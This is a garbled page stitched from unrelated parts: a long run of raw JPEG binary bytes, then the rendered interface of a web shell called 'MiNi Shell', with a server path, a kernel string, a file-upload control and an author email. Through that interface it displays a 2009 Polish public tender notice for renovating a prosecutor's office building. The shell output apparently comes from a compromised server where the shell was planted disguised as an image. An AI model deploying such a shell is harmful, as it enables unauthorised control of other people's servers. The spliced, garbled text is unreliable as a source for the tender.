JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090824/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090824/289644-N-2009.html

<p class="kh_header"><b>Zamość: Remont budynku Prokuratury Rejonowej w Janowie Lub. przy ul. Wojska Polskiego 19</b><br>
<b>Numer ogłoszenia: 289644 - 2009; data zamieszczenia: 24.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Zamościu , ul. Szczebrzeska 47, 22-400 Zamość, woj. lubelskie, tel. 084 6396091 do 93, 6396977, faks 084 6393325.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamosc.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku Prokuratury Rejonowej w Janowie Lub. przy ul. Wojska Polskiego 19.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Remont budynku Prokuratury Rejonowej w Janowie Lubelskim przy ul. Wojska Polskiego 19.
Kod CPV : 45000000 - 7 roboty budowlane
45310000- 3 roboty instalacyjne elektryczne
45410000-4 tynkowanie
45440000-3 roboty malarskie i szklarskie
2.Zakres zamówienia obejmuje wykonanie wszystkich prac prowadzących do osiągnięcia
stanu zgodnego z dokumentacją projektową oraz specyfikacją  wykonania i
odbioru robót budowlanych pod nazwą Remont budynku Prokuratury Rejonowej w Janowie Lub. przy ul. Wojska Polskiego 19, oraz wszystkie prace jakie z technicznegopunktu widzenia są konieczne do prawidłowego wykonania oraz przekazania doużytkowania zadania. - etap I i II .
Zakres zamówienia obejmuje w szczególności:
1.Rozebranie wewnętrznego obicia ścian listwami panelowymi z pcv
2.Wykonanie ścian wewnętrznych dla odrębnych pomieszczeń na parterze
3.Wymiana drzwi wewnętrznych i wejściowych do budynku
4.Remont pomieszczeń sanitarnych
5.Remont posadzek w pokojach biurowych
6.Wymiana urządzeń sanitarnych
7.Prace murarskie - uzupełnienie ścianek
8.Remont powierzchni tynków wewnętrznych ,uzupełnienia i przecierki
9.Remont instalacji elektrycznej
10.Prace malarskie tynków ścian i sufitów
3.REALIZACJA ROBÓT.
Przedmiotowe zadnie składa się z dwóch etapów i powinno być realizowane jednocześnie. Pierwszyetap - to przystosowanie pomieszczeń dla potrzeb kancelarii tajnej i serwerowni.
Drugi etap obejmuje wszystkie pozostałe prace remontowe określone przedmiarem robót.
Prowadzenie robót.
Na wstępie odłączyć trwale instalację gazową w kotłowni zasilającą budynek biurowy.
Realizację robót należy rozpocząć od wykonania prac budowlanych i wykończeniowych pomieszczeń kancelarii tajnej i serwerowni. Jednocześnie realizować zadania remontowe objęte drugim etapem. Jest to możliwe do wykonania ponieważ roboty będą prowadzone w odrębnym pomieszczeniu nie kolidującym z pozostałymi pracami.
Pierwszy etap realizacji zadania.
Inwestor zwraca uwagę na istniejące w budynku płytki terakoty i podłogi z parkietu,
które pozostają do dalszej eksploatacji.
Pomieszczenia Nr 7, 8, 9 i 10
1.W pierwszej kolejności z sufitu podwieszanego zdjąć i zabezpieczyć płyty gipsowe ,ozdobne i przystąpić do rozbiórki konstrukcji sufitu podwieszanego. Elementy sufitu podwieszanego jak również zdemontowane płyty gipsowe będą ponownie użyte do wykonania prac w pomieszczeniu Nr 7 
i korytarzu przed salą konferencyjną.
2.Następnie rozebrać parkiet na powierzchni ok. 60 % celem wykonania wykopów pod ściany działowe grubości 25 cm i 12 cm. oraz posadzek z płytek ceramicznych. Pozostałą powierzchnię zabezpieczyć przed zniszczeniem w pomieszczeniu Nr 7,
sala konferencyjna.
3.Zdemontować w całości boazerię z płyt pcv z rusztem drewnianym.Rozbiórkę prowadzić z możliwością jak największego odzysku materiału z pcv.
4.Całkowicie zdemontować drzwi wejściowe ,dwuskrzydłowe do istniejącej sali konferencyjnej wraz z ościeżnicą i otynkować ościeże. W tym miejscu nie planuje się montażu drzwi.
5.Zdemontować grzejnik spod okna,drugie od prawej strony sali konferencyjnej pom. Nr 9 i zaślepić otwory po odciętych gałązkach na rurach centralnego ogrzewania.
6.Po wycięciu posadzek cementowych wykonać wykopy na fundamenty pod ściany. Wykonać poziomą izolację, wymurować ściany z cegły pełnej kl.150 grubości 25 cm i 12 cm.
7.Ściany otynkować tynkiem zwykłym odpowiadającym kategorii III.
8.Ściany i sufity w pomieszczeniach 8, 9 i 10 miejscowo naprawić i przetrzeć do prac malarskich.
9.W pomieszczeniu Nr 10 zamontować nowy grzejnik z zaworem i głowicą termostatyczną typu PURMO C11 o wym. 100*60 cm i podłączyć do instalacji centralnego ogrzewania.
10.W pomieszczeniach Nr 8, 9 i 10 zamontować nowe przełączniki światła z dostosowaniem do funkcjonowania nowych pomieszczeń.
11.W korytarzu przed salą konferencyjną oraz w pomieszczeniach 8, 9 i 10 ułożyć płytki ceramiczne typu gres z cokolikami, antypoślizgowe - kolory jasne -ustali użytkownik.
12.W wejściu do pomieszczenia Nr 8 zamontować drzwi z pcv 90 na 200 z szybą bezpieczną, zamek automatyczny na kartę czytnika. Od zewnętrznej strony zamontować gałkę lub uchwyt a od wewnątrz klamkę. Drzwi z pcv pięciokomorowe. Bez ołowiu i kadmu. Skrzydło drzwi osadzone na trzech zawiasach. Dolna część skrzydła drzwi do wysokości zamka zabudowana następująco;

-po zewnętrznych stronach, blacha powlekana koloru jasnego siwego,
-wewnątrz założona płyta OSB grubości co najmniej 15 mm niemniej jednak dostosowana do grubości profilu skrzydła drzwi.
13.Drzwi wejściowe do pomieszczenia serwera powinny spełniać wymagania klasy Bwg PN-90/B92270 a zamki kluczowe - wymagania klasy B lub C wg PN-88 na B-94399,o zabudowie pełnej.
Drzwi wejściowe do kancelarii tajnej powinny spełniać wymagania klasy B
wg PN-90 na B92270 a zamki kluczowe - wymagania klasy B lub C wg PN-88 na B-94399,o zabudowie pełnej - kolorystyką dostosowane do pozostałych drzwi nowych.
14. Po przygotowaniu tynków - pomieszczenia 8, 9 i 10 pomalować następująco;
-sufity farbą emulsyjną koloru białego dwukrotnie z gruntowaniem
-ściany farba emulsyjną o symbolu K10-240 dwukrotnie z gruntowaniem.

 Realizacja pozostałych robót remontowych całości zadania.
Inwestor zwraca uwagę na istniejące w budynku płytki terakoty na korytarzach i podłogi z parkietu, które pozostają do dalszej eksploatacji.

1.Przystępując do realizacji robót w pozostałych pomieszczeniach budynku w pierwszejkolejności rozebrać płyty sufitu podwieszanego w przedsionku wejścia głównegodo budynku. Okładzinę sufitową zachować i zabezpieczyć przed uszkodzeniem. Będzie ona ponownie zamontowana.
Następnie w całości w budynku zdemontować okładzinę z paneli pcv wraz z rusztem drewnianym. Okładzinę demontować ostrożnie aby jak najwięcej odzyskać materiału w dobrym stanie technicznym. Odzyskany materiał pozostaje do dyspozycji użytkownika.
2.Podczas realizacji robót drugiego etapu należy;
W otwory okienne na parterze od zewnątrz dla pomieszczenia Nr 7 należy zamontować kraty opisane w rys. Nr 1 a dla pomieszczeń Nr 9 i 10 opisane w rys. Nr 2. Kraty powinny odpowiadać następującym warunkom technicznym;
a.Kraty z płaskownika 30*6 mm - skręcane o 90 o (opisane w rys. nr 1)
b.Obsadzenie krat w 8 miejscach dla większych okien i 5 miejscach dla mniejszych okiena każdy uchwyt co najmniej zagłębiony po 10 cm w ścianie. W tym przypadku dla ułatwienia montażu krat uchwyty można wykonać z prętów okrągłych gładkich
o średnicy 16mm i do nich przyspawać kraty. d. Kraty przed malowaniem oczyścić z rdzy, odtłuścić i pomalować farbą antykorozyjną 2 krotnie w kolorze czarnym. Przy osadzaniu krat istniejące zewnętrzne podokienniki zabezpieczyć przed uszkodzeniem. Należy również zabezpieczyć okna przed uszkodzeniem..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 45.41.00.00-4, 45.44.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5)spełniają następujące warunki dodatkowe:

a)dysponują lub będą dysponować minimum 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej. Osoba ta musi przynależeć do właściwej izby samorządu zawodowego.
 b)wykonali należycie w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o  udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w  tym okresie minimum dwie prace podobne do objętych przedmiotem zamówienia.
Za pracę podobną zamawiający uzna wykonanie robót budowlanych o wartości nie mniejszej niż   wysokość ceny ofertowej Wykonawcy brutto,  każda praca podobna.
Pod określeniem roboty budowlane należy rozumieć prace, w zakres których wchodzą roboty branży ogólnobudowlanej   bez określania udziału poszczególnych rodzajów robót w całkowitej wartości pracy podobnej.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy z wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty
potwierdzające spełnienie warunków udziału w postępowaniu:
1)  Oświadczenie wykonawcy, według wzoru, stanowiącego załącznik nr 2 do niniejszej siwz o spełnianiu warunków określonych w art. 22 ust. 1 ustawy,
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu wykonawców składających ofertę wspólną.
2)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do
rejestru lub zgłoszenia do ewidencji działalności, wystawione nie wcześniej niż 6
miesięcy przed upływem terminu składania ofert.
W przypadku składania oferty wspólnej ww. dokument składa każdy z wykonawców składających ofertę wspólną.
3)Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą
uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji
zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, atakże zakresu wykonywanych przez nie czynności, według wzoru, stanowiącegozałącznik nr 3 do niniejszej siwz.
W przypadku składania oferty wspólnej wykonawcy składają jeden wspólny wykaz osób którymi dysponują lub będą dysponować.
4)Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do
wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 3, wykonawca
wskazał osoby, którymi będzie dysponował.
5)Dokumenty stwierdzające, że osoby, o których mowa w ppkt 3, posiadają
wymagane uprawnienia tj :stwierdzenie przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz aktualne zaświadczenie o przynależności tej osoby do właściwej izby samorządu zawodowego,

6)Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania według wzoru, stanowiącego załącznik nr 4 do niniejszej siwz oraz dokumenty - np. referencje potwierdzające, że roboty te zostały wykonane należycie. Nie należy składać dokumentów dotyczących robót w trakcie wykonywania.
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny ww. wykaz. 
2. Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
1.ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz - załącznik nr 1 do siwz
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
2.odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w Rozdziale I pkt 5 zdanie 2 siwz lub w przypadku składania oferty wspólnej.
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
  3.oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom jeżeli
 wykonawca przewiduje udział podwykonawców.	
W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jeden wspólny wyżej wymieniony wykaz.
 4.kosztorys ofertowy do I i II etapu robót, według wzoru, stanowiącego załącznik nr 7 do siwz. Wartość robót  z kosztorysu, łączna  musi być równa wartości ceny ofertowej.
 W przypadku składania oferty wspólnej należy złożyć jeden dokument.
  5.wzór umowy parafowany na każdej stronie i podpisany na ostatniej stronie przez upoważnione    osoby - załącznik Nr 5 do siwz.
3.Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy, lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zamosc.po.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Zamościu , ul. Szczebrzeska 47, 22-400 Zamość, II piętro , pokój nr 22..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2009 godzina 09:45, miejsce: Prokuratura Okręgowa w Zamościu , ul. szczebrzeska 47, 22-400 Zamość, II piętro, pokój nr 22..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com